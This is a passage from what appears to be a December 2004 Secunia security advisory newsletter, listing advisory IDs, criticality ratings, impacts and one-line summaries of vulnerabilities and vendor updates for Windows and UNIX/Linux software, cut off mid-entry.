Overflow Vulnerability [SA13534] GREED "DownloadLoop()" Function Vulnerabilities [SA13532] DXFscope DXF File Parsing Buffer Overflow Vulnerability [SA13531] csv2xml "get_field_headers()" Buffer Overflow Vulnerability [SA13530] Convex 3D "readObjectChunk()" Buffer Overflow Vulnerability [SA13529] chbg "simplify_path()" Buffer Overflow Vulnerability [SA13527] libbsb "bsb_open_header()" Buffer Overflow Vulnerability [SA13526] asp2php Two Buffer Overflow Vulnerabilities [SA13525] abctab2ps Two Buffer Overflow Vulnerabilities [SA13524] abcpp "handle_directive()" Buffer Overflow Vulnerability [SA13523] abcm2ps "put_words()" Buffer Overflow Vulnerability [SA13522] abc2mtex "process_abc()" Buffer Overflow Vulnerability [SA13520] Red Hat update for gd [SA13517] SUSE update for file/phprojekt [SA13516] tnftp File Name Verification Vulnerability [SA13514] qwik-smtpd "HELO" Command Buffer Overflow Vulnerability [SA13512] abc2midi Two Buffer Overflow Vulnerabilities [SA13511] mpg123 "find_next_file()" Buffer Overflow Vulnerability [SA13506] Red Hat update for libxml [SA13497] Sun Java Messaging Server Webmail Script Insertion Vulnerability [SA13623] SUSE update for samba [SA13615] Fedora update for samba [SA13613] Red Hat update for samba [SA13612] Fedora update for krb5 [SA13597] Red Hat update for nfs-utils [SA13592] Kerberos V5 "libkadm5srv" Buffer Overflow Vulnerability [SA13582] Trustix update for samba [SA13573] Fedora update for CUPS [SA13570] Gentoo update for Samba [SA13540] LinPopUp "strexpand()" Function Buffer Overflow Vulnerability [SA13510] CUPS hpgltops and lppasswd Vulnerabilities [SA13507] Red Hat update for samba [SA13601] Fedora update for namazu [SA13600] Namazu "namazu.cgi" Cross-Site Scripting Vulnerability [SA13588] Mandrake update for aspell [SA13587] Gentoo update for nasm [SA13556] Email Sanitizer Unspecified MIME Denial of Service Vulnerability [SA13543] NASM "error()" Function Buffer Overflow Vulnerability [SA13610] SuSE update for kernel [SA13642] Docbook-to-Man Insecure Temporary File Creation [SA13640] LPRng "lprng_certs.sh" Script Insecure Temporary File Creation [SA13633] Debian debmake Insecure Temporary Directory Creation [SA13598] Red Hat update for rh-postgresql [SA13594] Red Hat update for glibc [SA13589] IBM AIX Multiple Privilege Escalation Vulnerabilities [SA13575] Debian update for ethereal [SA13572] Linux Kernel Multiple Vulnerabilities [SA13565] HP-UX newgrp Privilege Escalation Vulnerability [SA13528] changepassword Privilege Escalation Vulnerability [SA13521] Debian update for cscope [SA13519] Debian update for a2ps [SA13505] Red Hat update for zip [SA13503] Gentoo update for cscope [SA13501] NetBSD "compat" Privilege Escalation Vulnerabilities [SA13498] Gentoo update for vim/gvim [SA13625] Mandrake update for logcheck [SA13617] SUSE update for ncpfs [SA13549] uml-utilities Ethernet Connection Drop Security Issue Other: Cross Platform: [SA13632] Sybase ASE Three Unspecified Vulnerabilities [SA13508] MPlayer Multiple Vulnerabilities [SA13620] 2Bgal "id_album" SQL Injection Vulnerability [SA13564] IMG2ASCII Unspecified Vulnerability [SA13563] Kayako eSupport Cross-Site Scripting and SQL Injection [SA13555] Yanf "get()" Buffer Overflow Vulnerability [SA13518] Cosminexus Web Contents Generator Buffer Overflow Vulnerability [SA13515] Moodle Multiple Unspecified Security Issues [SA13513] Ikonboard "st" and "keywords" SQL Injection Vulnerability [SA13500] AtBas 2fax "expandtabs()" Buffer Overflow Vulnerability [SA13619] PsychoStats "login" Cross-Site Scripting Vulnerability [SA13576] PHPFormMail "output_html()" Cross-Site Scripting Vulnerabilities [SA13574] PHP-Nuke Workboard Module Cross-Site Scripting [SA13566] PERL Crypt::ECB Module ASCII "0" Encoding Security Issue [SA13504] 68 Designs Froogle Installation Security Issue [SA13593] Symantec Brightmail AntiSpam Notifier Denial of Service ======================================================================== 5) Vulnerabilities Content Listing Windows:-- [SA13621] SurgeMail Unspecified Webmail Security Issue Critical: Moderately critical Where: From remote Impact: Unknown Released: 2004-12-23 A security issue with an unknown impact has been reported in SurgeMail. Full Advisory: http://secunia.com/advisories/13621/ -- [SA13583] Crystal FTP Client "LIST" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-20 Luca Ercoli has discovered a vulnerability in Crystal FTP, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13583/ -- [SA13571] ArGoSoft Mail Server Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-20 A vulnerability has been reported in ArGoSoft Mail Server, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/13571/ -- [SA13618] Citrix Metaframe XP Unspecified Buffer Overflow Vulnerability Critical: Moderately critical Where: From local network Impact: System access Released: 2004-12-22 A vulnerability has been reported in Citrix Metaframe XP, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13618/ -- [SA13605] tlen URL Script Insertion Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-21 A vulnerability has been reported in tlen, allowing malicious people to inject arbitrary script code. Full Advisory: http://secunia.com/advisories/13605/ -- [SA13591] WinRAR Delete File Buffer Overflow Vulnerability Critical: Less critical Where: From remote Impact: System access Released: 2004-12-22 Vafa Khoshaein has discovered a vulnerability in WinRAR, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13591/ -- [SA13578] Windows Media Player ActiveX Control Two Vulnerabilities Critical: Less critical Where: From remote Impact: Manipulation of data, Exposure of system information, Exposure of sensitive information Released: 2004-12-20 Arman Nayyeri has discovered two vulnerabilities in Microsoft Windows Media Player, which can be exploited by malicious people to disclose system information, and modify or disclose some sensitive information. Full Advisory: http://secunia.com/advisories/13578/ -- [SA13567] Google Desktop Search Exposure of Local Search Results Critical: Less critical Where: From remote Impact: Exposure of sensitive information Released: 2004-12-21 A vulnerability has been reported in Google Desktop Search, which can be exploited by malicious people to view local search results. Full Advisory: http://secunia.com/advisories/13567/ -- [SA13569] GamePort Two Security Bypass Vulnerabilities Critical: Less critical Where: Local system Impact: Security Bypass Released: 2004-12-21 amoXi and Dr.vaXin have discovered two security issues in GamePort, which can be exploited by malicious, local users to bypass some security restrictions. Full Advisory: http://secunia.com/advisories/13569/ UNIX/Linux:-- [SA13639] Red Hat update for acroread Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-23 Red Hat has issued an update for acroread. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13639/ -- [SA13636] KDE kpdf "doImage()" Buffer Overflow Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-23 The vendor has acknowledged a vulnerability in kpdf, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13636/ -- [SA13629] Fedora update for libtiff Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-23 Fedora has issued an update for libtiff. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13629/ -- [SA13626] Mandrake update for kdelibs Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-23 MandrakeSoft has issued an update for kdelibs. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13626/ -- [SA13622] Mandrake update for mplayer Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-23 MandrakeSoft has issued an update for mplayer. This fixes multiple vulnerabilities, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13622/ -- [SA13614] Red Hat update for PHP Critical: Highly critical Where: From remote Impact: System access, DoS, Privilege escalation, Security Bypass Released: 2004-12-22 Red Hat has issued an update for PHP. This fixes some vulnerabilities, which can be exploited to gain escalated privileges, bypass certain security restrictions, gain knowledge of sensitive information, or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13614/ -- [SA13611] Fedora update for PHP Critical: Highly critical Where: From remote Impact: System access, DoS, Privilege escalation, Security Bypass Released: 2004-12-22 Fedora has issued an update for PHP. This fixes some vulnerabilities, which can be exploited to gain escalated privileges, bypass certain security restrictions, gain knowledge of sensitive information, or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13611/ -- [SA13608] HP-UX FTP Server Debug Logging Buffer Overflow Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-22 iDEFENSE has reported a vulnerability in HP-UX, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13608/ -- [SA13607] LibTIFF Two Integer Overflow Vulnerabilities Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-22 infamous41md has reported two vulnerabilities in LibTIFF, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13607/ -- [SA13602] xpdf "doImage()" Buffer Overflow Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-22 A vulnerability has been reported in xpdf, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13602/ -- [SA13595] Red Hat update for XFree86 Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2004-12-21 Red Hat has issued an update for XFree86. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13595/ -- [SA13590] Mandrake update for ethereal Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2004-12-21 MandrakeSoft has issued an update for ethereal. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13590/ -- [SA13586] KDE Konqueror Java Sandbox Security Bypass Vulnerabilities Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-20 Two vulnerabilities have been reported in KDE Konqueror, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13586/ -- [SA13585] Gentoo update for mplayer Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-21 Gentoo has issued an update for mplayer. This fixes multiple vulnerabilities, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13585/ -- [SA13581] Red Hat update for XFree86 Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2004-12-20 Red Hat has issued an update for xfree86. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13581/ -- [SA13568] Mandrake update for php Critical: Highly critical Where: From remote Impact: Security Bypass, Exposure of sensitive information, Privilege escalation, System access Released: 2004-12-20 Mandrakesoft has issued an update for php. This fixes some vulnerabilities, which can be exploited to gain escalated privileges, bypass certain security restrictions, gain knowledge of sensitive information, or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13568/ -- [SA13562] Gentoo update for PHP Critical: Highly critical Where: From remote Impact: System access, Privilege escalation, Exposure of sensitive information, Security Bypass Released: 2004-12-20 Gentoo has issued an update for PHP. This fixes some vulnerabilities, which can be exploited to gain escalated privileges, bypass certain security restrictions, gain knowledge of sensitive information, or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13562/ -- [SA13561] Gentoo update for Ethereal Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2004-12-20 Gentoo has issued an update for Ethereal. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13561/ -- [SA13559] Gentoo update for KDE kfax Critical: Highly critical Where: From remote Impact: DoS, System access Released: 2004-12-20 Gentoo has issued an update for KDE kfax. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13559/ -- [SA13557] Gentoo update for phpMyAdmin Critical: Highly critical Where: From remote Impact: System access, Exposure of sensitive information Released: 2004-12-20 Gentoo has issued an update for phpMyAdmin. This fixes two vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system and by malicious users to disclose sensitive information. Full Advisory: http://secunia.com/advisories/13557/ -- [SA13542] NapShare "auto_filter_extern()" Function Buffer Overflow Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-20 Bartlomiej Sieka has reported a vulnerability in NapShare, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13542/ -- [SA13533] Bolthole Filter "save_embedded_address()" Function Buffer Overflow Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-20 Ariel Berkman has reported a vulnerability in filter, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13533/ -- [SA13502] xine-lib "open_aiff_file()" Buffer Overflow Vulnerability Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-17 Ariel Berkman has reported a vulnerability in xine-lib, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13502/ -- [SA13499] Gentoo update for acroread Critical: Highly critical Where: From remote Impact: System access Released: 2004-12-17 Gentoo has issued an update for acroread. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13499/ -- [SA13635] Rpm Finder "web()" Buffer Overflow and Insecure File Creation Critical: Moderately critical Where: From remote Impact: Privilege escalation, System access Released: 2004-12-23 Two vulnerabilities have been reported in Rpm Finder, which can be exploited by malicious people to compromise a user's system and by malicious, local users to perform certain actions with escalated privileges. Full Advisory: http://secunia.com/advisories/13635/ -- [SA13624] Mandrake update for krb5 Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-23 Mandrake has issued an update for krb5. This fixes a vulnerability, which potentially can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13624/ -- [SA13616] Gentoo update for mpg123 Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-22 Gentoo has issued an update for mpg123. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13616/ -- [SA13606] Gentoo update for Zwiki Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-22 Gentoo has issued an update for Zwiki. This fixes a vulnerability, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/13606/ -- [SA13584] Debian update for xzgv Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-21 Debian has issued an update for xzgv. This fixes multiple vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13584/ -- [SA13580] Debian update for htget Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-20 Debian has issued an update for htget. This fixes a vulnerability, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13580/ -- [SA13579] htget Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-20 infamous41md has reported a vulnerability in htget, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13579/ -- [SA13560] Gentoo update for kdelibs / kdebase Critical: Moderately critical Where: From remote Impact: Exposure of sensitive information, Spoofing Released: 2004-12-20 Gentoo has issued updates for kdebase and kdelibs. These fix some vulnerabilities, which can be exploited by malicious people to spoof the content of websites. Full Advisory: http://secunia.com/advisories/13560/ -- [SA13558] Gentoo update for abcm2ps Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-20 Gentoo has issued an update for abcm2ps. This fixes a vulnerability, which can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13558/ -- [SA13554] YAMT "id3tag_sort()" Function Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-20 Manigandan Radhakrishnan has reported a vulnerability in YAMT, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13554/ -- [SA13553] xlreader "book_format_sql()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-20 Tom Palarz and Kris Kubicki have reported a vulnerability in xlreader, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13553/ -- [SA13552] Vilistextum "get_attr()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-20 Ariel Berkman has reported a vulnerability in Vilistextum, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13552/ -- [SA13551] vb2c "parse()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-20 Qiao Zhang has reported a vulnerability in vb2c, allowing malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13551/ -- [SA13550] UnRTF "process_font_table()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-20 Yosef Klein and Limin Wang have reported a vulnerability in UnRTF, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13550/ -- [SA13548] rtf2latex2e "ReadFontTbl()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-17 Limin Wang has reported a vulnerability in rtf2latex2e, allowing malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13548/ -- [SA13547] Ringtone Tools "parse_emelody()" Function Buffer Overflow Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-20 Qiao Zhang has reported a vulnerability in Ringtone Tools, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13547/ -- [SA13546] pgn2web "process_moves()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-17 A vulnerability has been reported in pgn2web, allowing malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13546/ -- [SA13545] Pcal "getline()" and "get_holiday()" Buffer Overflow Vulnerabilities Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-20 Danny Lungstrom has reported two vulnerabilities in Pcal, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13545/ -- [SA13544] o3read "parse_html()" Function Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-20 Wiktor Kopec has reported a vulnerability in o3read, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13544/ -- [SA13541] Mesh Viewer "Mesh::type()" Function Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-20 Mohammed Khan and Danny Lungstrom have reported a vulnerability in Mesh Viewer, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13541/ -- [SA13539] Junkie FTP Client Two Vulnerabilities Critical: Moderately critical Where: From remote Impact: Manipulation of data, System access Released: 2004-12-20 Yosef Klein has reported two vulnerabilities in Junkie, which can be exploited by malicious people to manipulate files or compromise a user's system. Full Advisory: http://secunia.com/advisories/13539/ -- [SA13538] jpegtoavi "get_file_list_stdin()" Function Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-20 James Longstreet has reported a vulnerability in jpegtoavi, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13538/ -- [SA13537] jcabc2ps "switch_voice()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-17 A vulnerability has been reported in jcabc2ps, allowing malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13537/ -- [SA13536] IglooFTP File Manipulation Vulnerabilities Critical: Moderately critical Where: From remote Impact: Manipulation of data Released: 2004-12-20 Two vulnerabilities have been reported in IglooFTP, which can be exploited to substitute uploaded files or overwrite files on the user's system. Full Advisory: http://secunia.com/advisories/13536/ -- [SA13535] html2hdml "remove_quote()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-17 A vulnerability has been reported in html2hdml, allowing malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13535/ -- [SA13534] GREED "DownloadLoop()" Function Vulnerabilities Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-20 Manigandan Radhakrishnan has reported two vulnerabilities in GREED, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13534/ -- [SA13532] DXFscope DXF File Parsing Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-20 Ariel Berkman has reported a vulnerability in DXFscope, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13532/ -- [SA13531] csv2xml "get_field_headers()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-17 Limin Wang has reported a vulnerability in csv2xml, allowing malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13531/ -- [SA13530] Convex 3D "readObjectChunk()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-17 Ariel Berkman has reported a vulnerability in Convex 3D, allowing malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13530/ -- [SA13529] chbg "simplify_path()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-17 Danny Lungstrom has reported a vulnerability in chbg, allowing malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13529/ -- [SA13527] libbsb "bsb_open_header()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-17 A vulnerability has been reported in libbsb, allowing malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13527/ -- [SA13526] asp2php Two Buffer Overflow Vulnerabilities Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-17 Qiao Zhang has reported two vulnerabilities in asp2php, allowing malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13526/ -- [SA13525] abctab2ps Two Buffer Overflow Vulnerabilities Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-17 Limin Wang has reported two vulnerabilities in abctab2ps, allowing malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13525/ -- [SA13524] abcpp "handle_directive()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-17 Yosef Klein has reported a vulnerability in abcpp, allowing malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13524/ -- [SA13523] abcm2ps "put_words()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-17 Limin Wang has reported a vulnerability in abcm2ps, allowing malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13523/ -- [SA13522] abc2mtex "process_abc()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-17 Limin Wang has reported a vulnerability in abc2mtex, allowing malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13522/ -- [SA13520] Red Hat update for gd Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-17 Red Hat has issued an update for gd. This fixes some vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13520/ -- [SA13517] SUSE update for file/phprojekt Critical: Moderately critical Where: From remote Impact: Security Bypass, System access Released: 2004-12-17 SUSE has issued updates for file and phprojekt. These fix two vulnerabilities, which can be exploited by malicious people to bypass certain security restrictions or potentially compromise a user's system. Full Advisory: http://secunia.com/advisories/13517/ -- [SA13516] tnftp File Name Verification Vulnerability Critical: Moderately critical Where: From remote Impact: Manipulation of data, System access Released: 2004-12-17 Yosef Klein has reported a vulnerability in tnftp, allowing malicious people to overwrite local files. Full Advisory: http://secunia.com/advisories/13516/ -- [SA13514] qwik-smtpd "HELO" Command Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: Security Bypass Released: 2004-12-17 Jonathan Rockway has reported a vulnerability in qwik-smtpd, which can be exploited by malicious people to relay mail. Full Advisory: http://secunia.com/advisories/13514/ -- [SA13512] abc2midi Two Buffer Overflow Vulnerabilities Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-17 Limin Wang has reported two vulnerabilities in abc2midi, allowing malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13512/ -- [SA13511] mpg123 "find_next_file()" Buffer Overflow Vulnerability Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-17 Bartlomiej Sieka has reported a vulnerability in mpg123, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13511/ -- [SA13506] Red Hat update for libxml Critical: Moderately critical Where: From remote Impact: System access Released: 2004-12-17 Red Hat has issued an update for libxml. This fixes multiple vulnerabilities, which potentially can be exploited by malicious people to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13506/ -- [SA13497] Sun Java Messaging Server Webmail Script Insertion Vulnerability Critical: Moderately critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-16 A vulnerability has been reported in iPlanet Messaging Server / Sun ONE Messaging Server, which can be exploited by malicious people to conduct script insertion attacks. Full Advisory: http://secunia.com/advisories/13497/ -- [SA13623] SUSE update for samba Critical: Moderately critical Where: From local network Impact: System access Released: 2004-12-23 SUSE has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13623/ -- [SA13615] Fedora update for samba Critical: Moderately critical Where: From local network Impact: System access Released: 2004-12-22 Fedora has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13615/ -- [SA13613] Red Hat update for samba Critical: Moderately critical Where: From local network Impact: System access Released: 2004-12-22 Red Hat has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13613/ -- [SA13612] Fedora update for krb5 Critical: Moderately critical Where: From local network Impact: Privilege escalation, System access Released: 2004-12-22 Fedora has issued an update for krb5. This fixes two vulnerabilities, which can be exploited by malicious, local users to perform certain actions on a vulnerable system with escalated privileges and potentially by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13612/ -- [SA13597] Red Hat update for nfs-utils Critical: Moderately critical Where: From local network Impact: DoS, System access Released: 2004-12-21 Red Hat has issued an update for nfs-utils. This fixes some vulnerabilities, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13597/ -- [SA13592] Kerberos V5 "libkadm5srv" Buffer Overflow Vulnerability Critical: Moderately critical Where: From local network Impact: System access Released: 2004-12-21 Michael Tautschnig has reported a vulnerability in Kerberos V5, which potentially can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13592/ -- [SA13582] Trustix update for samba Critical: Moderately critical Where: From local network Impact: System access Released: 2004-12-20 Trustix has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13582/ -- [SA13573] Fedora update for CUPS Critical: Moderately critical Where: From local network Impact: Manipulation of data, DoS, System access Released: 2004-12-20 Fedora has issued an update for CUPS. This fixes two vulnerabilities, which can be exploited by malicious users to manipulate certain files, cause a DoS (Denial of Service), or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13573/ -- [SA13570] Gentoo update for Samba Critical: Moderately critical Where: From local network Impact: System access Released: 2004-12-20 Gentoo has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13570/ -- [SA13540] LinPopUp "strexpand()" Function Buffer Overflow Vulnerability Critical: Moderately critical Where: From local network Impact: System access Released: 2004-12-20 Stephen Dranger has reported a vulnerability in LinPopUp, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13540/ -- [SA13510] CUPS hpgltops and lppasswd Vulnerabilities Critical: Moderately critical Where: From local network Impact: Manipulation of data, DoS, System access Released: 2004-12-17 Two vulnerabilities have been reported in CUPS, which can be exploited by malicious users to manipulate certain files, cause a DoS (Denial of Service), or compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13510/ -- [SA13507] Red Hat update for samba Critical: Moderately critical Where: From local network Impact: System access Released: 2004-12-17 Red Hat has issued an update for samba. This fixes a vulnerability, which can be exploited by malicious users to compromise a vulnerable system. Full Advisory: http://secunia.com/advisories/13507/ -- [SA13601] Fedora update for namazu Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-21 Fedora has issued an update for namazu. This fixes a vulnerability, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/13601/ -- [SA13600] Namazu "namazu.cgi" Cross-Site Scripting Vulnerability Critical: Less critical Where: From remote Impact: Cross Site Scripting Released: 2004-12-21 A vulnerability has been reported in Namazu, which can be exploited by malicious people to conduct cross-site scripting attacks. Full Advisory: http://secunia.com/advisories/13600/ -- [SA13588] Mandrake update for aspell Critical: Less critical Where: From remote Impact: System access Released: 2004-12-21 MandrakeSoft has issued an update for aspell. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13588/ -- [SA13587] Gentoo update for nasm Critical: Less critical Where: From remote Impact: System access Released: 2004-12-20 Gentoo has issued an update for nasm. This fixes a vulnerability, which potentially can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13587/ -- [SA13556] Email Sanitizer Unspecified MIME Denial of Service Vulnerability Critical: Less critical Where: From remote Impact: DoS Released: 2004-12-20 A vulnerability has been reported in Email Sanitizer, which can be exploited by malicious people to cause a DoS (Denial of Service). Full Advisory: http://secunia.com/advisories/13556/ -- [SA13543] NASM "error()" Function Buffer Overflow Vulnerability Critical: Less critical Where: From remote Impact: System access Released: 2004-12-17 Jonathan Rockway has reported a vulnerability in NASM, which can be exploited by malicious people to compromise a user's system. Full Advisory: http://secunia.com/advisories/13543/ -- [SA13610] SuSE update for kernel Critical: Less critical Where: From local network Impact: Unknown, Exposure of sensitive information, Privilege escalation, DoS Released: 2004-12-22 SUSE has issued an update for the kernel. This fixes multiple vulnerabilities, 